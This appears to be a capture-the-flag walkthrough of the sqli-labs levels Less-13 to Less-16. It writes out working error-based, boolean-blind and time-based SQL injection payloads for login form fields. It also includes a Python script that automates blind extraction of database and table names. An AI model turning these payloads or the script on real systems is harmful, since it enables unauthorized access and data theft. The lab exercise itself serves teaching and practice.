Less-13 to Less-16

Less-13

First, as in Less-12, submit the same username and password. Less-12 echoed the query result; Less-13 returns nothing meaningful.

uname=admin&passwd=admin&submit=Submit only shows the login-success image; no further information is displayed.

Logging in with a username that does not exist fails: uname=adm&passwd=admin&submit=Submit

uname=adm' or 1=1 #&passwd=admin&submit=Submit produces an SQL error, and the error message shows how the query is built: the value is wrapped in a single quote and a parenthesis. So the closing sequence is ') and the working payload is 1') or 1=1 #

A UNION query gets us nowhere either. Assuming two columns, uname=adm') union select 1,2 #&passwd=admin&submit=Submit gives no usable output: the page never displays anything the query selects, so UNION-based extraction is ruled out here.

Guessing the database name:

Since nothing is echoed, we fall back on blind injection.

Time-based: uname=adm') or if(length(database())>7,1,sleep(5)) #&passwd=admin&submit=Submit

With >7 the page comes back immediately (the condition is true, so the if() returns 1). With if(length(database())>8,1,sleep(5)) the condition is false, sleep(5) runs and the response is delayed. The database name is therefore 8 characters long. Note that sleep() is evaluated for every row of the users table on which the left side of the OR is false, so the delay can be a multiple of 5 seconds.

Then pick off the name one character at a time. uname=adm') or left(database(),1)>'a' #&passwd=admin&submit=Submit tests whether the first character sorts after 'a'; move the comparison character until the boundary is found.

Alternatively, read the schema names from information_schema instead of relying on database(): uname=ain') or left((select schema_name from information_schema.schemata limit 0,1),1)>'a' #&passwd=admin&submit=Submit

Doing this by hand is tedious, so we brute-force it, testing each candidate character with an equality check:

uname=ain') or left((select schema_name from information_schema.schemata limit 0,1),1)='a' #&passwd=admin&submit=Submit

The first letter turns out to be i. When the guess is right the condition is true, the WHERE clause matches and flag.jpg (the login-success image) is displayed; otherwise the login fails.

Next, the second character: compare left(...,2) against the known first letter followed by each candidate in turn, e.g. left((select schema_name from information_schema.schemata limit 0,1),2)='ia', then 'ib', and so on until the login succeeds.

Continue in the same way for positions 3, 4, 5, ... until the whole database name is recovered.

Less-14

uname=admin&passwd=admin&submit=Submit logs in normally.

uname=admin'#&passwd=admin&submit=Submit: a single quote does not break out of the query here.

uname=admin" #&passwd=admin&submit=Submit: a double quote does, and the # comments out the rest of the query, so this level closes the value with a double quote.

uname=admi" or length(database())='8'#&passwd=admin&submit=Submit

The username admi does not exist, so the login succeeds only if the OR condition is true, i.e. if the database name is 8 characters long. The same boolean probe works for every other condition below.

The closing sequence for each level:

Less-13: ')
Less-14: "
Less-15: '
Less-16: ")

Query payloads (shown for Less-14; swap in the closer for the other levels):

First table name in the security database (exact-match guess):
uname=admi" or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)='a'#&passwd=admin&submit=Submit

First schema name:
uname=ain" or left((select schema_name from information_schema.schemata limit 0,1),1)='u' #&passwd=admin&submit=Submit

First table name (comparison guess):
uname=adin" or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)>'a'#&passwd=admin&submit=Submit

First column name of the users table (adding and table_schema='security' avoids matching a users table in another database):
uname=adin" or left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='a'#&passwd=admin&submit=Submit
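The boolean probes above (length(...)>N to get the length, then left(...,k)='known prefix + guess' one position at a time, each prefixed with the current level's closer and ended with #) are easy to automate. The following Python script is an added example, not part of the original write-up: it builds exactly those payloads for Less-13 to Less-16 and drives them through an oracle function that answers true when the response indicates a successful login. It assumes the lab's form takes uname, passwd and submit and shows flag.jpg on success, as described above; the URL is a placeholder for your own lab instance, and because the script has to run offline here, the demo uses a constructed stand-in oracle with made-up values instead of a live target.

```python
import re
import urllib.parse
import urllib.request
from typing import Callable, Dict

# Sequence that closes the quoted value in each level's WHERE clause
# (from the write-up: Less-13 ') , Less-14 " , Less-15 ' , Less-16 ") ).
CLOSERS: Dict[int, str] = {13: "')", 14: '"', 15: "'", 16: '")'}

# Candidates for the brute force. MySQL's default collation compares
# case-insensitively, so lowercase is enough for schema/table/column names.
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789_"

# Expressions to read out, taken from the write-up's payloads.
EXPR_DATABASE = "database()"
EXPR_FIRST_SCHEMA = "(select schema_name from information_schema.schemata limit 0,1)"
EXPR_FIRST_TABLE = ("(select table_name from information_schema.tables "
                    "where table_schema='security' limit 0,1)")

Oracle = Callable[[str], bool]   # uname value -> did the login succeed?


def build_payload(level: int, condition: str) -> str:
    """uname value: a non-existent user, the level's closer, OR <condition>,
    and '#' to comment out the rest of the original query."""
    return f"adm{CLOSERS[level]} or {condition} #"


def find_length(level: int, expr: str, oracle: Oracle, max_len: int = 64) -> int:
    """Binary search on length(expr)>N (the write-up's length(database())>7 probe)."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(build_payload(level, f"length({expr})>{mid}")):
            lo = mid + 1          # longer than mid characters
        else:
            hi = mid              # at most mid characters
    return lo


def extract(level: int, expr: str, oracle: Oracle, charset: str = CHARSET) -> str:
    """Recover expr one character at a time with left(expr,k)='known+guess'."""
    length = find_length(level, expr, oracle)
    known = ""
    for pos in range(1, length + 1):
        for ch in charset:
            if oracle(build_payload(level, f"left({expr},{pos})='{known}{ch}'")):
                known += ch
                break
        else:
            raise ValueError(f"no candidate matched at position {pos}; extend CHARSET")
    return known


def http_oracle(url: str) -> Oracle:
    """Real oracle: POST the form and treat flag.jpg in the response as 'true'.
    url is a placeholder that you point at your own lab instance."""
    def oracle(uname: str) -> bool:
        data = urllib.parse.urlencode(
            {"uname": uname, "passwd": "admin", "submit": "Submit"}).encode()
        with urllib.request.urlopen(url, data=data, timeout=30) as resp:
            return b"flag.jpg" in resp.read()
    return oracle


def make_fake_oracle(secrets: Dict[str, str]) -> Oracle:
    """Constructed offline stand-in for the lab: answers the two probe shapes
    the extractor emits from a dictionary of expression -> value."""
    len_re = re.compile(r"length\((.+)\)>(\d+) #$")
    left_re = re.compile(r"left\((.+),(\d+)\)='([^']*)' #$")

    def oracle(uname: str) -> bool:
        m = len_re.search(uname)
        if m:
            return len(secrets[m.group(1)]) > int(m.group(2))
        m = left_re.search(uname)
        if m:
            return secrets[m.group(1)][:int(m.group(2))] == m.group(3)
        return False              # anything else: login fails
    return oracle


if __name__ == "__main__":
    # Made-up target values; against a real instance use http_oracle("http://<host>/Less-13/").
    fake = make_fake_oracle({EXPR_DATABASE: "security",
                             EXPR_FIRST_SCHEMA: "information_schema",
                             EXPR_FIRST_TABLE: "users"})
    for lvl in CLOSERS:
        print(lvl, repr(build_payload(lvl, "1=1")))
    print("database():", extract(13, EXPR_DATABASE, fake))
    print("first schema:", extract(14, EXPR_FIRST_SCHEMA, fake))
    print("first table :", extract(16, EXPR_FIRST_TABLE, fake))
```

For the time-based variant (the sleep(5) probes), only the oracle changes: send the request, measure the elapsed time and return True when it comes back below the sleep threshold; the payload builder and the extraction loop stay the same.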

Determining the length

The probe can also go in the passwd field. For Less-16:

uname=adminadmin&passwd=admiand") or if(length(database())>1,1,sleep(5))#&submit=Submit

If the response is immediate, the name is longer than 1 character; raise the number until the sleep kicks in. As a sanity check, a condition that is certainly false, such as if(length(database())>1000,1,sleep(5)), must always produce the delay; if it does not, the injection is not being executed.

Source: www.cnblogs.com/xingyuner/p/12234841.html